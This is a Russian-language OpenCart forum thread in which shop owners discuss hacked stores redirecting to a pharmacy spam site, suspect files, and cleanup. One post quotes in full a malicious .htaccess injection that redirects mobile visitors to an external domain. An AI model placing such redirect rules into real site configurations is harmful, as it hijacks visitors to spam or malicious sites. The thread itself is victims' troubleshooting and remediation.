Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
  • Sign Up

Появилась переадресация на mysafemedz.com, что это?


Recommended Posts

Добрый день! Подскажите, откуда появилась переадресация на какой-то непонятный сайт mysafemedz. com

из вместо ссылок на страницы:

1). О нас

2). Информация о доставке

3). Условия соглашения

4). Наши партнёры

5). Как нас найти

Все эти страницы создаются в разделе Каталог->Статьи

Пытался переименовать ссылки в админке на эти страницы, но история таже. Или на сайт или ошибка 502 Bad Gateway.

Link to post
Share on other sites

Вирус однако! :ph34r:

  • +1 1
Link to post
Share on other sites

Где именно вирус? На хосте или у меня?

Link to post
Share on other sites

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

  • +1 2
Link to post
Share on other sites

Загляните в свой  htacsess   ,скорей всего вирус переписал его.

  • +1 2
Link to post
Share on other sites

одновременно было взломано куча сайтов, на разных хостингах...

у многих было перенаправление на этот сайт mysafemedz. com

у меня тоже дня 3-4 назад..

 

был изменен файл htacsess

и в папке dawnoad была куча файлов всяких разных.

 

заменил пароли все, файлы удалил,

файл htacсess изменил на новый.

 

Сегодня хостер отключил сайты. Говорит спамят....((

 

что делать, где искать..?

айболитом сайт проверял - показывал вредоносный файл где то здесь

php excel - не знаю что с ним не так и где искать..

теперь айболит не работает (((

Хостер не включит сайт пока все проблемы не решу..

Link to post
Share on other sites

У меня такая же беда. Ко всему вышесказанному добавлю еще, что в админке в Загрузках лежит файл info.php3.9ff4d3f2cd9c13d89382e0475b291494. Нужно копаться в файлах загруженных в папку download. К сожалению я ее случайно удалил.

Link to post
Share on other sites

Вот еще админ хостера прислал:

/docs/system/PHPExcel/Classes/PHPExcel

 

как я и говорил - айболит показывал тоже самое,

это модуль эксель импрот экспрот - только какой не помню - найду напишу.

 

Копец модули получается качать тоже нельзя? )) я их только с этого сайта беру...

Link to post
Share on other sites

Вот файл что качал и устанваливал:

 

export-import-xls-OCSTORE - 1.5.4.1

 

ссылка https://opencartforum.com/files/file/687-eksport-import-export-import-xls-dlia-ocstore-1541/

 

получается либо файл изначально с кодом,

либо в нем уязвимость и потом код там появляется?

Link to post
Share on other sites

Похоже, что эпидемия!!

На другом моем сайта, у другого хостера ocstore 1.5.4.1 в папке download

файл 404.php.393f651a5afbd676aa7e4202d08ea292. Прикрепляю.

А в .htaccess добавлено:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://skriptogram.ru/?i=2043&l=1 [L,R=302]
#########!rataman!#########

Проверил остальные свои сайты. Пока чистые.

Link to post
Share on other sites

Пойду заварю коффейку покрепче! Ну а иначе как ещё Вам дать точный ответ,как не по кофейной гуще гадая.

У меня было такое поганое настроение, пока я не прочел Ваш комментарий, спасибо  :-D 

Link to post
Share on other sites

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

Link to post
Share on other sites

За эту неделю нашёл по просьбе эту бяку в трёх магазинах.В основном переписывается  htaccsess.

  • +1 2
Link to post
Share on other sites

кто-нибудь нашел решение проблемы? сегодня в руки попал магазин с такой-же проблемой, рассылал спам, в папке download лежали веселые файлики

 

Если вы видите что к вам загрузили скрипты не относящиеся к opencart это говорит о том что вашем сайте есть уязвимость через которую злоумышленник может сделать с вашими файлами все что угодно. И пока уязвимость не будет устранена, вам будут загружать вредоносный код. Самый простой способ не допустить этого проверяйте все файлы которые вы скачиваете с интернета, в частности шаблоны которые были украдены и выложены в свободный доступ, а также различные модули. В данном случае лучше удалить все файлы и заново установить opencart, предварительно скачав картинки и дамп базы данных. Так как уязвимость может быть замаскирована под обычный код и не профессионал вряд ли его обнаружит.

Link to post
Share on other sites

  • 5 weeks later...

Всем привет.

У меня на одном хостинге, два магазина, один тестовый, другой нормальный. У тестового пароль и логин admin. Так вот, захожу сегодня на хостинг, смотрю в корневую директорию, а там куча новых папок, с короткими названиями, типа kuy, lg и тп. В этих папках txt ридми фалы и html файлы, открыл html фаил, он ведет на американский сайт

  рекламирующий добавки и средства для похудания. Тестовый магазин, сегодня быстренько снес.

Самое интересное, что реальный магазин не тронули, ломанули только тестовый. Может потому что у меня там стоял стандартный шаблон Opencart, а в нем описание товаров на английском, амерские хакеры наверно подумали, что это крутой магазин, торгующий электроникой))
Посмотрел, на посетителей, реального инет магазина, было два посетителя, один с Канады, другой с США. Видать и его пытались ломануть, но пароль к админке не смогли подобрать.

Я вот только не пойму, как они магазин ломанули, неужели через админку? Теперь наверно и от хостинга пароль придется менять.

Link to post
Share on other sites

Думаю через админку ломанули магазин, а уже через админку и хостинг (если такое возможно конечно)

Link to post
Share on other sites

  • 1 year later...

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить? А как восстановить htaccess? У меня таких файла три штуки в разных папках. Что с ними сделать надо?

Link to post
Share on other sites

для начала надо разобраться, что за файлы.

htaccess - без излишеств можно взять из архива используемой версии движка.

но если добавляли в него правила/настройки - НЕЛЬЗЯ бездумно перезаписывать свой файл оригинальным.

Link to post
Share on other sites

А подскажите, вот у меня в папке gownload тоже около 10 файлов с кракозяблами в названии. Мне их удалить?

удаляйте, не удаляйте, через пару дней они там снова будут.

 

А как восстановить htaccess?

с чего вы взяли, что файл изменен?

Link to post
Share on other sites

Ок. Вот мои три файла htaccess

 

вот, который в VQMOD:

 

# Prevent Directoy listing
Options -Indexes

<FilesMatch "\.(xml|cache)">
Order deny,allow
Deny from all
</FilesMatch>

 

Вот который в html public

(только я там заменила кое-что на ----------, т.к. не знаю, можно ли это выкладывать.)

 

# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

# 2. In your opencart directory rename htaccess.txt to .htaccess.

# For any support issues please visit: http://www.opencart.com

Options +FollowSymlinks

# Prevent Directoy listing
Options -Indexes

# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>

# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

RewriteBase /
RewriteRule ^sitem----------------------------------------------------------------------
RewriteRule ^goo------------------------------------------------------------------------
RewriteRule ^dow-----------------------------------------------------------------------
RewriteCond %--------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteCond %{------------------------------------------------------------------------
RewriteRule ^([-------------------------------------------------------------------------

### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off

# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off

# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M

# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M

# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200

# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200

# 7. disable open_basedir limitations
# php_admin_value open_basedir none

 

А вот, который в /public_html/admin/view/javascript/ckeditor/.htaccess

 

#

# Copyright © 2003-2012, CKSource - Frederico Knabben. All rights reserved.
# For licensing, see LICENSE.html or http://ckeditor.com/license
#

#
# On some specific Linux installations you could face problems with Firefox.
# It could give you errors when loading the editor saying that some illegal
# characters were found (three strange chars in the beginning of the file).
# This could happen if you map the .js or .css files to PHP, for example.
#
# Those characters are the Byte Order Mask (BOM) of the Unicode encoded files.
# All FCKeditor files are Unicode encoded.
#

AddType application/x-javascript .js
AddType text/css .css

#
# If PHP is mapped to handle XML files, you could have some issues. The
# following will disable it.
#

AddType text/xml .xml

 

 

Можете ли вы, уважаемые знатоки, глянуть - они правильные или нет?

Спасибо.

Link to post
Share on other sites

чистые.

в корне магазина (второй) скрывать нечего - он базовый.

Link to post
Share on other sites

Я посмотрела на куки, которые создаются при отображении моей страницы, и обнаружила, что записываются куки с эдак так 20 сайтов! Там есть и Алибаба, и Алиэкспресс, и Мегого.ру, и 777...ру и много другого. А еще через "Отображение кода страницы" в браузере я вижу, что при отображении сайта идет обращение только с моему сайту (мое доменное имя) и один раз в стороннему виджету "101виджет".

Правильно ли я понимаю, что надо убрать и этот 101виджет. А далее смотреть: если куки появятся заново - то баг где-то именно в коде сайта, а не на стороне?

Ход правильный?

Link to post
Share on other sites

Сторонние куки сайтов могут быть от всяких лайко-шара-твито-кнопочек и счетчиков статистики, которые вы ставили

Link to post
Share on other sites

Да. Я это понимаю. Поэтому я временно убрала все счетчики, метрику, аналитикс, ВК, кнопочки. Осталось лишь "101виджет".

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.